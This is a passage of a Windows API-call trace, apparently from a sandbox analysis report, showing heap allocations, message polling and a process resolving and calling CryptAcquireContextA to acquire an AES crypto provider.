[0239.410] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0239.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0239.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0239.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0239.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0239.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f378 | out: hHeap=0x970000) returned 1 [0239.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0239.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0239.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0239.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0239.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0239.411] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0239.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0239.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0239.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0239.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0239.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0239.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f440 [0239.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0239.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0239.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0239.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0239.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0239.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0239.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0239.411] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0239.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0239.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0239.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0239.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f530 [0239.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0239.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0239.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0239.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f760 [0239.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0239.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0239.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0239.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f508 [0239.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0239.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0239.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0239.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0239.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0239.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0239.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0239.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0239.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f530 | out: hHeap=0x970000) returned 1 [0239.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0239.412] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0239.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0239.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0239.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0239.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0239.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0239.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0239.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0239.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0239.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0239.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0239.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0239.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0239.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0239.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0239.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0239.413] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0239.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0239.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0239.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0239.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0239.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f040e0 [0239.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0239.414] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0239.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f040e0 | out: hHeap=0x970000) returned 1 [0239.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0239.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e78 [0239.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0239.414] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0239.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0239.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0239.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0239.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0239.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0239.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0239.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0239.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0239.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0239.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0239.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0239.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0239.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0239.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0239.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0239.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0239.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0239.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0239.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0239.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0239.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0239.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0239.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0239.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0239.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0239.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0239.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0239.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0239.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0239.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0239.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0239.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0239.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0239.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0239.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0239.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0239.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0239.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0239.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0239.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0239.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0239.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0239.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0239.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0239.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0239.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0239.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0239.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0239.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0239.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0239.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0239.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0239.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0239.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0239.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0239.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0239.417] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0239.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0239.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0239.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0239.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0239.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0239.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0239.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0239.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0239.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0239.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0239.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0239.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0239.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0239.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0239.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0239.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0239.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0239.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0239.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0239.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0239.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0239.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0239.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0239.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0239.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0239.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0239.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0239.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0239.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0239.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0239.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0239.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0239.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0239.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0239.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0239.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0239.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0239.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0239.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0239.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0239.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0239.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0239.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0239.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0239.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0239.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5d0 [0239.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0239.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0239.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0239.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0239.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0239.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0239.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0239.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0239.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0239.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0239.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0239.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0239.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0239.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0239.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69928, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0239.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0239.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0239.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0239.420] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0239.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0239.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0239.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0239.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04348 [0239.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0239.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0239.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0239.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e699c8 [0239.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e699c8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0239.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0239.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0239.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0239.422] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0239.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0239.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0239.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04348 | out: hHeap=0x970000) returned 1 [0239.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0239.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0239.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0239.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0239.422] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0239.476] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0239.476] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0239.476] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0239.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04620 | out: hHeap=0x970000) returned 1 [0239.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0239.477] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0239.477] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0239.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0239.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0239.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f800 | out: hHeap=0x970000) returned 1 [0239.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0239.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f468 | out: hHeap=0x970000) returned 1 [0239.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0239.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0239.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0239.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0239.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: 